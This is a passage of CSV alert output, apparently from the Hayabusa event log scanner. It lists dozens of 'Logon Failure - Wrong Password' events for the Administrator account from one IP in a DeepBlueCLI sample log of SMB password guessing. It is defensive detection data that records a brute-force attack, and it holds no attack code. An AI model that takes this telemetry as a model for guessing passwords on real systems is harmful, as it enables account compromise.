9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.353 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.634 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.761 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.821 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.915 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.944 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.992 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.101 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.344 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:01.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.615 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.647 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.900 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.072 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.173 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.205 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.506 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.622 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.708 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.758 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.803 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.963 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.082 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.186 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.272 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.305 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.387 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.505 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
